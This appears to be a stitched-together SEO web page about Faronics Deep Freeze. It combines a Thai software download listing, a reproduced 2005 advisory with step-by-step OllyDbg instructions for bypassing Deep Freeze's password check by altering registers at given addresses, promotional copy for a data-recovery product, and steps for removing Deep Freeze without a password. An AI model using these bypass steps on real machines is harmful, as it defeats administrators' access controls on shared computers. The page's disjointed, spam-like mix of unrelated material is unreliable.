Deep Freeze Windows Xp

1. Deep Freeze Console Windows 10
2. Deep Freeze Windows Update

‘ Deep Freeze ‘makes computing environments easier to manage and maintain. Each restart eradicates all changes and resets the computer to its original state, right down to the last byte'. This article describes a method to bypass the Deep Freeze's authentication mechanism.'. ระบบปฏิบัติการ: Windows XP/ Vista / 7 / 8 and 8.1 / Windows 10 ผู้พัฒนา: Faronics License: Shareware ภาษา: English ขนาด: 11 MB ประเภทไฟล์: RAR รหัสผ่าน: mawto สถานะ: ทดสอบแล้ว.

Summary

‘Deep Freeze ‘makes computing environments easier to manage and maintain. Each restart eradicates all changes and resets the computer to its original state, right down to the last byte'. This article describes a method to bypass the Deep Freeze's authentication mechanism.'

‘The information has been provided by Emiliano Torres.
The original article can be found at: http://usuarios.arnet.com.ar/fliamarconato/‘

Details

‘Vulnerable Systems:
* Deep Freeze versions 5.20.* and 5.30.*
* Deep Freeze versions 3.32.*

Immune Systems:
* DeepFreeze version 5.5

Tools needed:
Ollydgb to patch the program and run it.

OllyScript to run scripts on Ollydgb.

ASPack 2.12 OEP finder script by hacnho/VCT2k4 to find the OEP.

Process Explorer for 2K/XP to see the login program command line.

DeASPack for AsPack 2.11 to unpack the login program. (for Deep Freeze 3.32.000.0534)

Summary:
What we are going to do is to load a new instance of Deep Freeze login program and we'll change it in such a way that it will accept any password as a valid one.

Let's get to work:
1. The first thing we are going to do is finding some data we're going to use later to load our login program instance. To do that load Process Explorer. In this program we can see a list of all the processes our PC is running, among them is the login program called FrzState.exe or FrzState2k.exe. Find this program on the list, expanding the tree if necessary. Once you've found it, right click over the program's name and a menu with options will show up. Select the option ‘Properties'. A window will show up with the process properties.

2. In the properties window you'll see a property called ‘Command line'. On this box you can see the program's location, remember that. At the end of the text box there are three numbers that you have to write down to use later. Once you've written them down you can close Process Explorer.

Deep Freeze for Windows 2K/XP
3. Now run Ollydbg. Note: Make sure OllyScript is properly installed. There should be a menu called ‘Plugins' where you'll find a submenu called ‘OllyScript'. If this menu doesn't appear in the program, that means you haven't installed the plugin properly. To install it, go to the menu ‘Options' and select ‘Appearance'. In the ‘Plugin path' box write the address where you copied OllyScript files, press OK and restart the program.
On the menu ‘File' select ‘Open' and look for the login program file (remember that Process Explorer told you where it was). In the ‘Arguments' box write the three numbers you've written down. Now click ‘Open'. If a warning message box shows up press ‘OK', and if later a message box ask you if you want to continue the code analysis press ‘No'.

Deep Freeze Console Windows 10

4. We have loaded the program, the problem is that it's protected with Aspack 2.12 and we can't see the real code. To solve this we're going to use OllyScript and the ASPack 2.12 OEP finder script. Go to the ‘Plugins' menu, and then to the ‘OllyScript' submenu and select ‘Run script'.

5. Look for the script and open it. The script will find the OEP (original entry point). If any window shows up dismiss it. Note: We are now on the OEP. If you are an experienced user you can dump the program using OllyDump to analyze the code with a disassembler.

6. Deep Freeze can be configured to hide the system tray icon (next to the clock). If you can't see the Deep Freeze icon follow the steps on this Annex and then resume this tutorial.

7. Right click over the code and a context menu will appear, select ‘Go to' and then ‘Expression' (or use the shortcut Ctrl+G).

8. In the text box enter the following value according to the Deep Freeze version you have installed and press OK.

Version Value
4.20.020.0598 40368D
4.20.120.0598 40368D
4.20.121.0613 4034F5
5.20.220.1125 4037E9
5.30.120.1181 4037E9

The program will jump to that line of code.
9. This is the line from where the password verification procedure is called. Let's set a breakpoint here. To do that right click over the line and in the context menu select ‘Breakpoint' and then ‘Toggle' (or press F2).

10. We are almost done! Now let's run this new Deep Freeze login program instance. To do that press F9. If everything went right now you should see two Deep Freeze icons on the system tray next to the clock. If Deep Freeze was configured to hide it (read annex), instead of two icons you'll see an empty icon.
Note: If the icon doesn't show up is possible that you haven't written the argument three numbers correctly or that you haven't opened the right file.

11. Now activate the login program by double clicking over the icon while you keep the shift key pressed. If there are two icons, is important that you click over the new icon and not over the old one. The login window will appear asking for the password. Write anything in the password box and press ENTER. The breakpoint we set earlier in Ollydbg will activate and the login program will freeze.
Note: If the breakpoint doesn't activate is possible that you've chosen the wrong icon. Try with the other one.

12. On Ollydbg press F8 to step over the function call. On the registers window (to the right of the code) you'll see that EAX register has the value 00000000. That means the password is incorrect, let's change that. Double click over the value of EAX to open the modification window. In the ‘Hexadecimal' text box write 1 and press OK.

13. Now press F9 to continue. If everything went right the Deep Freeze configuration dialog will show up.

Deep Freeze 5.20.250.1125 and 5.30.150.1181 (Windows 9X):
3. Now we're going to kill the login program. If you try to close it now you'll see that the process shows up again on the list. To close it for good we first have to kill the process called MSGSRV32.EXE. Look for this process on the list, then right click over it and select ‘Kill Process'. If a confirmation message appears answer Yes. Next, right click over the process FrzState9X.exe and select ‘Kill Process' again. Now the login program should be dead. Note: If the icon of Deep Freeze still remains on the system tray next to the clock, hover the mouse cursor over it to make it disappear.

4. Now run Ollydbg. Note: Make sure OllyScript is properly installed. There should be a menu called ‘Plugins' where you'll find a submenu called ‘OllyScript'. If this menu doesn't appear in the program, that means you haven't installed the plugin properly. To install it, go to the menu ‘Options' and select ‘Appearance'. In the ‘Plugin path' box write the address where you copied OllyScript files, press OK and restart the program. On the menu ‘File' select ‘Open' and look for the login program file (remember that Process Explorer told you where it was). Now click ‘Open'. If a warning message box shows up press ‘OK', and if later a message box ask you if you want to continue the code analysis press ‘No'.

5. We have loaded the program, the problem is that it's protected with Aspack 2.12 and we can't see the real code. To solve this we're going to use OllyScript and the ASPack 2.12 OEP finder script. Go to the ‘Plugins' menu, and then to the ‘OllyScript' submenu and select ‘Run script'.

6. Look for the script and open it. The script will find the OEP (original entry point). If any window shows up dismiss it. Note: We are now on the OEP. If you are an experienced user you can dump the program using OllyDump to analyze the code with a disassembler.

7. Right click over the code and a context menu will appear, select ‘Go to' and then ‘Expression' (or use the shortcut Ctrl+G).

8. In the text box enter the following value according to the Deep Freeze version you have installed and press OK.

Version Value
5.20.250.1125 408D34
5.30.150.1181 408E08

The program will jump to that line of code.

9. In this line the program decides if the password is correct. Let's set a breakpoint here. To do that right click over the line and in the context menu select ‘Breakpoint' and then ‘Toggle' (or press F2).

10. We are almost done! Now let's run this new Deep Freeze login program instance. To do that press F9. If Deep Freeze is configured to show the icon, now you'll see it on the system tray next to the clock.

11. Now activate the login program by double clicking over the icon while you keep the shift key pressed or by pressing CTRL+ALT+SHIFT+F6. The login window will appear asking for the password. Write anything in the password box and press ENTER. The breakpoint we set earlier in Ollydbg will activate and the login program will freeze.

12. On the registers window (to the right of the code) you'll see that the Z flag is set to 1. That means the password is incorrect, let's change that. Double click over the Z flag value and you'll see it changes to 0.

13. Now press F9 to continue. If everything went right the Deep Freeze configuration dialog will show up.

Deep Freeze 3.32.000.0534 (Windows 9X):
3. Now we're going to kill the login program. If you try to close it now you'll see that the process shows up again on the list. To close it for good we first have to kill the process called MSGSRV32.EXE. Look for this process on the list, then right click over it and select ‘Kill Process'. If a confirmation message appears answer Yes. Next, right click over the process FrzState.exe and select ‘Kill Process' again. Now the login program should be dead. Note: If the icon of Deep Freeze still remains on the system tray next to the clock, hover the mouse cursor over it to make it disappear.

4. This version of Deep Freeze is protected with Aspack 2.11, so before we can work with the login program we have to unpack the file, and for that we are going to use DeASPack. Run DeASPack and a dialog box will show up and ask you to select a file to unpack. Look for the login program file (remember that Process Explorer told you where it was). Now click ‘Open'. The program will unpack the file and the dialog box will close.

5. Now run Ollydbg. On the menu ‘File' select ‘Open' and look for the unpacked file. The file is called out.exe and is in the same folder the login program is. Nex click ‘Open'.

6. When Ollydbg finish analyzing the program, right click over the code and a context menu will appear, select ‘Go to' and then ‘Expression' (or use the shortcut Ctrl+G).

7. In the text box enter 417410 and press OK. The program will jump to that line of code.

8. In this line the program decides if the password is correct. Let's set a breakpoint here. To do that right click over the line and in the context menu select ‘Breakpoint' and then ‘Toggle' (or press F2).

9. We are almost done! Now let's run this new Deep Freeze login program instance. To do that press F9. If Deep Freeze is configured to show the icon, now you'll see it on the system tray next to the clock.

10. Now activate the login program by double clicking over the icon while you keep the shift key pressed or by pressing CTRL+ALT+SHIFT+F6. The login window will appear asking for the password. Write anything in the password box and press ENTER. The breakpoint we set earlier in Ollydbg will activate and the login program will freeze.

11. On the registers window (to the right of the code) you'll see that the Z flag is set to 1. That means the password is incorrect, let's change that. Double click over the Z flag value and you'll see it changes to 0.

12. Now press F9 to continue. If everything went right the Deep Freeze configuration dialog will show up.

Vendor Response:
‘Faronics takes the security of our products very seriously and we began working on resolution to the password security issue as soon as we were made aware of it. We are happy to report that the issue was resolved on June 12, 2005 with a new Deep Freeze 5.5 release of the Standard, Professional, and Enterprise versions. In fact, the issue was already resolved before it was posted on the SecuriTeam site. We have already made all of our customers aware that the new version is available. If you are a Deep Freeze customer and have not received notification, you can request an update using the form at: http://www.faronics.com/html/updates.asp

It is important to note that the method described must be used on each workstation individually and the perpetrator would require physical access to the workstation; it will not work over a network.

It requires an industrious, knowledgeable user who can find, download, and use the utilities that are referred to in the tutorial. Even then, the procedure must be followed to the letter and will not work in all cases. In cases where it does work, the user has essentially fooled Deep Freeze into believing that a correct password has been entered on that one individual workstation. The user could then tell Deep Freeze to boot Thawed and would therefore be able to make a permanent change to that single computer. This has been resolved with the 5.5 release and the method will no longer function.'

Supposing that you've ever wanted to maintain a system state to keep it secure and not allow any changes, then you might want to try deep freezing your Windows computer. Unlike a factory reset, which wipes everything back to the manufacturer's default, a deep freeze allows you to create a specific system state that you want your computer to restore back to.

If you are a Deep Freeze user or a victim of loss of files due to Deep freeze like in the above-mentioned scenario, then don't worry. There is a way you could recover lost files after Deep Freeze-rescue your data deleted after running Deep Freeze application by using FoneLab Data Retriever.

Guide List

1. What is Deep Freeze?

Deep Freeze is a software driver that safeguards hard drive reliability by redirecting certain data which is being written to the hard disk. With the usage of Deep Freeze, it is possible to grant unrestricted access to your system and at the same time it makes sure that any changes made to your computer through regular use like installation of unauthorized program, configuration changes, unintentional installation of malware and viruses, etc.

When you restart the computer in which you have installed Deep Freeze, it will remove all changes made to the system since the last restart. It will also remove any data files saved on the local hard disk i.e. on your Windows 'C' drive. So if you wish that the changes should still present when the computer is restarted, you have to disable Deep Freeze application and enable it whenever necessary.

2. Recovery Method Lost File after Deep Freeze

However, if you are late to do so and lost your data then don't worry. You can rescue your data deleted after running Deep Freeze application by using FoneLab Data Retriever.

It is recommended to use FoneLab Data Retriever Software in order to restore files that have been lost due to Deep Freeze in simple steps. It will help you to recover your lost data in original form. It operates in the read-only mode which reads the required data and copies it to the desired location.

FoneLab Data Retriever

FoneLab Data Retriever - recover the lost/deleted data from computer, hard drive, flash drive, memory card, digital camera and more.

• Recover photos, videos, documents and more data with ease.
• Preview data before recovery.
• Recover data from device, iCloud and iTunes.

Download the FoneLab Data Retriever and install it.

Launch FoneLab Data Retriever. Choose the file type and location, then click Scan.

The software will start quickly to find lost data on the selected location. After the Quick Scan, you can see the scan result on the interface. If you can't find lost files, you can try Deep Scan, but it will take more time.

Check the scan results in each section to find the data that was unfortunately erased, select the files you want, click Recover then you will get the lost file back.

3. Uninstall Deep Freeze-Detail Steps

Operation 1: Uninstall Deep Freeze with password

Disable the Deep Freeze before uninstall:

Deep Freeze Windows Update

1. Press Shift key, double click Deep Freeze icon and open Deep Freeze Standard.
2. Enter your password, select Boot Thawed.
3. Restart your computer.
4. If successful, restart your computer and boot it in normal mode. There you can see the Deep Freeze icon will be marked X, meaning it has been disabled.
5. Find installation file and uninstall it using the installer.

Operation 2: Uninstall Deep Freeze without password

In the event of the password being forgotten or not knowing it, there is a solution. The trick is to use Windows Task Manager under debugging mode and kill the process associated with Deep freeze. After this one can restart and boot normally.

1. Restart your computer.
2. Press DEL, F10 or F2 while the computer starts up to enter the CMOS setup.
3. Change the date by 10 years, save, and then restart your computer.
4. Before the Windows logo shows up, press F8.
5. When prompted, choose Debug mode or Debugging Mode.
6. In Debug mode, select the OS you use – (for example Windows XP Pro).
7. When Windows PC starts, wait for the welcome screen to appear and get ready to press CTRL+ALT+DEL as soon as the desktop appears.
8. End 'DFServ' program.
9. Find the file of Deep Freeze and delete it.

With Deep Freeze, worries of malware, slowdowns, file congestion, unauthorized applications, and hard drive degradation is common which may the results in loss of important files. So it is advised to keep a backup copy of necessary files.

Conclusion

Whether you just want to protect your own computer or a whole bank of them, deep freezing a system can come in very useful. No longer do you have to worry about anything troubling your system again – simply restart and the changes are gone!

You don't even have to use these programs permanently. For example, there might be times where you let someone play around on your system and you could enable one of these utilities prior to the fact in order to maintain your preferred state.

In addition to restoring lost files, this software can also recover images, videos, audios, emails and other types of files from hard drive, computer, flash drive, digital camera, and more

This reliable data recovery will guarantee that it won't store any of these data to its server when you retrieve lost files. Whatever the reason for data loss, you can download this software to try out.

Related Articles: